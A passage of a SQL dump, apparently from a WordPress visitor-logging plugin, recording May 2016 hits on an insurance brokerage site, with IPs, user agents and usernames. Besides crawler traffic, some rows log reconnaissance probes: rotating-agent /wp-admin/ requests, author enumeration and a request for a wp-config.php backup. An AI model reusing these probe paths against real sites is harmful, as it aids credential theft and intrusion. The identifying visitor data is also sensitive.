NokiaN9','','',0,'Nokia','Nokia','us','','','','','','','0','0',0),(29484,'0b_5f19de1d7aea6c57821cf8200fbe57e2','1463122732','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(29487,'0b_5f19de1d7aea6c57821cf8200fbe57e2','1463122733','54.211.7.6','ec2-54-211-7-6.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(29489,'0b_e8c280541c4a4728465afec5d8f2bb07','1463123128','122.168.196.170','abts-mp-static-170.196.168.122.airtelbroadband.in','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win10','Chrome 50','in','','','','','','','0','0',0),(29492,'0b_e8c280541c4a4728465afec5d8f2bb07','1463123133','122.168.196.170','abts-mp-static-170.196.168.122.airtelbroadband.in','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 50','in','','','','','','','0','0',0),(29493,'0b_bc80f1422fb8099f8f4d518dd213568c','1463123683','100.43.81.152','spider-100-43-81-152.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(29496,'0b_9ef95c8497f9f851ea6d8242f6e24fb4','1463123727','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29499,'0b_9ef95c8497f9f851ea6d8242f6e24fb4','1463123737','40.77.167.18','msnbot-40-77-167-18.search.msn.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29502,'0b_72891c9c4715c8cf0d9172696c3a4999','1463125317','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(29504,'0b_72891c9c4715c8cf0d9172696c3a4999','1463125320','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(29507,'0b_72891c9c4715c8cf0d9172696c3a4999','1463125322','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(29508,'0b_60c2437278e832fe812f9b12c1901399','1463126410','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29510,'0b_50c70df02b8f6e0c56c1be30e2bc88e0','1463130617','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(29511,'0b_1d2e23dc9763eb967035c7f08833a829','1463130987','122.168.196.170','abts-mp-static-170.196.168.122.airtelbroadband.in','/File Folder empire-bk-13052016.zip','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 50','in','1366 x 768','','','','','','0','0',0),(29513,'0b_f6097859b41a96f64ce042c0b8dcf91b','1463131092','207.46.13.38','msnbot-207-46-13-38.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29514,'0b_604ade66c5ab6785153df180971638a6','1463131330','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(29516,'0b_e6081be2775f812f71b66cc5e61364c0','1463131330','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(29517,'0b_1814516d82317c9404bae481aa2f164e','1463131334','107.182.231.98','6bb6e700.lon.100tb.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'Win7','Firefox 15','ua','','','','','','','0','0',0),(29519,'0b_602ade3c00be19e94b15c934c2bde954','1463132053','107.182.231.98','6bb6e700.lon.100tb.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'Win7 x64','Firefox 15','ua','','','','','','','0','0',0),(29522,'0b_a32d1d5c870992637b69c03a53cf5870','1463132624','107.182.231.98','6bb6e700.lon.100tb.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'Win7 x64','Firefox 15','ua','','','','','','','0','0',0),(29525,'0b_a514563a4fcbd620ebe10da705f984a5','1463133009','130.185.155.82','130.185.155.82','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(29528,'0b_a514563a4fcbd620ebe10da705f984a5','1463133019','130.185.155.82','130.185.155.82','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(29531,'0b_a514563a4fcbd620ebe10da705f984a5','1463133029','130.185.155.82','130.185.155.82','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(29534,'0b_a32d1d5c870992637b69c03a53cf5870','1463133542','107.182.231.98','6bb6e700.lon.100tb.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinVista','Firefox 15','ua','','','','','','','0','0',0),(29537,'0b_98f6ab4c45764767db80a14e9b8f3484','1463133749','182.73.155.5','182.73.155.5','/','Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0','','',0,'Win7','Firefox 46','us','','','','','','','0','0',0),(29540,'0b_98f6ab4c45764767db80a14e9b8f3484','1463133763','182.73.155.5','182.73.155.5','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0','http://www.empireins.com/','',0,'Win7','Firefox 46','us','','','','','','','0','0',0),(29543,'0b_98f6ab4c45764767db80a14e9b8f3484','1463133764','182.73.155.5','182.73.155.5','/','Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0','','',0,'Win7','Firefox 46','us','','','','','','','0','0',0),(29544,'0b_98f6ab4c45764767db80a14e9b8f3484','1463133789','182.73.155.5','182.73.155.5','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0','http://www.empireins.com/','',0,'Win7','Firefox 46','us','','','','','','','0','0',0),(29547,'0b_99e5a90c66b79df97780fdaa85a64e66','1463134206','69.30.198.242','69.30.198.242','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(29549,'0b_99e5a90c66b79df97780fdaa85a64e66','1463134301','69.30.198.242','69.30.198.242','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(29550,'0b_9cc43bed22faea616638148fc542df40','1463134456','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/robots.txt','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32','','',0,'Win10','Google Chrome','ua','','','Unknown Spider','','','','3','0',0),(29553,'0b_9cc43bed22faea616638148fc542df40','1463134457','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32','','',0,'Win10','Google Chrome','ua','','','Unknown Spider','','','','3','0',0),(29556,'0b_9cc43bed22faea616638148fc542df40','1463134460','46.119.127.129','sol-fttb.129.127.119.46.sovam.net.ua','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32','','',0,'Win10','Google Chrome','ua','','','','','','','3','0',0),(29559,'0b_f7d3e5bd083ec809793c5c12fa126698','1463134599','104.238.192.2','104-238-$192.unassigned.userdns.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'Win7 x64','Firefox 15','ua','','','','','','','0','0',0),(29561,'0b_6ece8fd0a4876de373f211d54707cbe6','1463139879','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29562,'0b_6ece8fd0a4876de373f211d54707cbe6','1463139891','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29564,'0b_19411bb4c5c1d7d199377886b44d0bc3','1463140841','104.238.192.2','104-238-$192.unassigned.userdns.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP x64','Firefox 15','ua','','','','','','','0','0',0),(29567,'0b_31a6992b9ed48ad394f0094772ce0c63','1463140886','62.210.152.87','62-210-152-87.rev.poneytelecom.eu','/wp-config.php~','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','eu','','','','','','','3','0',0),(29570,'0b_bcedd5821b34a561521eca4d3a195941','1463141532','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)','http://accessories.afora.ru/','',0,'Win2003 x64','IE 6','','','','','','','','0','0',0),(29573,'0b_bcedd5821b34a561521eca4d3a195941','1463141532','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)','http://accessories.afora.ru/','',0,'Win2003 x64','IE 6','','','','','','','','0','0',0),(29576,'0b_492d347ff9d7d50ff38c3933b279e3ba','1463142183','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(29577,'0b_5d08828450f91d993948af23de720659','1463142301','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(29579,'0b_5d08828450f91d993948af23de720659','1463142303','144.76.93.46','static.46.93.76.144.clients.your-server.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(29582,'0b_d7ea6be103b2e79f692c9928fd1cc71e','1463142904','66.249.66.18','crawl-66-249-66-18.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29583,'0b_870c4abfc3292845c33cd599906cb93c','1463143366','157.55.39.57','msnbot-157-55-39-57.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29585,'0b_65332695c9998015f32088dafb82bbfe','1463143428','100.43.90.9','spider-100-43-90-9.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(29586,'0b_65332695c9998015f32088dafb82bbfe','1463143432','100.43.90.9','spider-100-43-90-9.yandex.com','/case-status/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(29588,'0b_248d610d956a1f2bb5494b7797db6a37','1463143828','104.238.192.2','104-238-$192.unassigned.userdns.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinVista','Firefox 15','ua','','','','','','','0','0',0),(29591,'0b_4eb61f2d1134dccfbc36f7de4c7a875e','1463144275','66.249.83.133,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(29594,'0b_1aff4ab24bd129c336e717b12ea254c6','1463144276','66.249.83.150,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(29597,'0b_2a27b6ddc337f9290b94e2f3246babc0','1463144823','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(29600,'0b_30705260aae49828058d0612ae5b09e5','1463144951','104.238.192.2','104-238-$192.unassigned.userdns.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'Win7','Firefox 15','ua','','','','','','','0','0',0),(29603,'0b_48405f80e8fee673438fa3ced62d83f7','1463146029','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29606,'0b_e40806c9a0c5f56ad057c70f1ffd50bb','1463147010','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(29609,'0b_e40806c9a0c5f56ad057c70f1ffd50bb','1463147010','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(29612,'0b_e40806c9a0c5f56ad057c70f1ffd50bb','1463147012','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(29613,'0b_e40806c9a0c5f56ad057c70f1ffd50bb','1463147100','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(29615,'0b_e40806c9a0c5f56ad057c70f1ffd50bb','1463147114','67.85.210.17','ool-4355d211.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1600 x 900','','','','Biny1280','','0','51',0),(29616,'0b_74f1a7a9cafcfe320811c9c530f952e9','1463147558','66.249.66.14','crawl-66-249-66-14.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(29619,'0b_074716c00516cadf035c6a3d2649c8ff','1463147630','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(29621,'0b_9f9c8950098c67c992ed28beda6fcb4a','1463147759','109.163.230.84','lh18197.voxility.net','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(29624,'0b_75d7306a635232627d6347d484c5bf65','1463148104','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29625,'0b_614656c2da9196517154be6e59843dc4','1463148251','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(29628,'0b_614656c2da9196517154be6e59843dc4','1463148269','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(29630,'0b_614656c2da9196517154be6e59843dc4','1463148291','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(29631,'0b_541ff135a54de49df456661d254f39e7','1463148604','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29632,'0b_541ff135a54de49df456661d254f39e7','1463148632','157.55.39.57','msnbot-157-55-39-57.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29634,'0b_614656c2da9196517154be6e59843dc4','1463148718','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(29635,'0b_614656c2da9196517154be6e59843dc4','1463148722','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(29637,'0b_77567edf7d451e771218eb47a9f22935','1463150033','107.21.1.8','ec2-107-21-1-8.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)','http://www.empireins.com/','',0,'','','us','','','','','','','0','0',0),(29640,'0b_b6a4d0cbeb6514a561625fba3676bf96','1463151048','104.238.192.2','104-238-$192.unassigned.userdns.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'Win7','Firefox 16','ua','','','','','','','0','0',0),(29641,'0b_367171e0fe9ac48638d966e0d6f43cb5','1463151706','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(29644,'0b_367171e0fe9ac48638d966e0d6f43cb5','1463151710','67.212.162.98','scan03.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(29647,'0b_367171e0fe9ac48638d966e0d6f43cb5','1463151713','67.212.162.98','scan03.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(29649,'0b_367171e0fe9ac48638d966e0d6f43cb5','1463151716','67.212.162.98','scan03.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(29650,'0b_367171e0fe9ac48638d966e0d6f43cb5','1463151719','67.212.162.98','scan03.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(29652,'0b_d358384c00b155124cba28f2daac9ba7','1463151841','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(29655,'0b_021aeea9852081c8c382debea6d3070c','1463152713','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(29656,'0b_5f0ce9615de7e3bd9e4f7c264a4332fc','1463153656','70.214.69.28','28.sub-70-214-69.myvzw.com','/meet-the-eib-team/','Mozilla/5.0 (Linux; Android 6.0.1; VS987 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36','android-app://com.google.android.googlequicksearchbox','',0,'Android 6','Chrome 50 Mobile','us','','','','','','','0','0',0),(29659,'0b_5a813148cec3278996b2497b25e24b86','1463155033','51.255.51.69','69.ip-51-255-51.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(29662,'0b_5a813148cec3278996b2497b25e24b86','1463155037','51.255.51.69','69.ip-51-255-51.eu','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(29664,'0b_5a813148cec3278996b2497b25e24b86','1463155040','51.255.51.69','69.ip-51-255-51.eu','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(29665,'0b_5a813148cec3278996b2497b25e24b86','1463155045','51.255.51.69','69.ip-51-255-51.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(29667,'0b_5a813148cec3278996b2497b25e24b86','1463155050','51.255.51.69','69.ip-51-255-51.eu','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(29668,'0b_5a813148cec3278996b2497b25e24b86','1463155055','51.255.51.69','69.ip-51-255-51.eu','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(29670,'0b_614656c2da9196517154be6e59843dc4','1463155790','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(29671,'0b_614656c2da9196517154be6e59843dc4','1463155797','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(29674,'0b_614656c2da9196517154be6e59843dc4','1463155807','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(29677,'0b_7020365629dab9d56dd2a1f2eb122b58','1463157944','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','','',0,'Win7 x64','IE 10','us','','','','','','','0','0',0),(29679,'0b_b94a898ae03d33b44eb663ad7aa8e1d0','1463158051','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(29682,'0b_b94a898ae03d33b44eb663ad7aa8e1d0','1463158121','75.99.37.250','ool-4b6325fa.static.optonline.net','/case-status/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 10','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(29683,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158134','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(29685,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158136','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(29686,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158146','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(29688,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158153','24.186.240.34','ool-18baf022.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(29689,'0b_9621a097bebd75dab02caaeff47fe5b7','1463158160','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','http://www.empireins.com/igo/','',0,'Win7','Chrome 50','us','1600 x 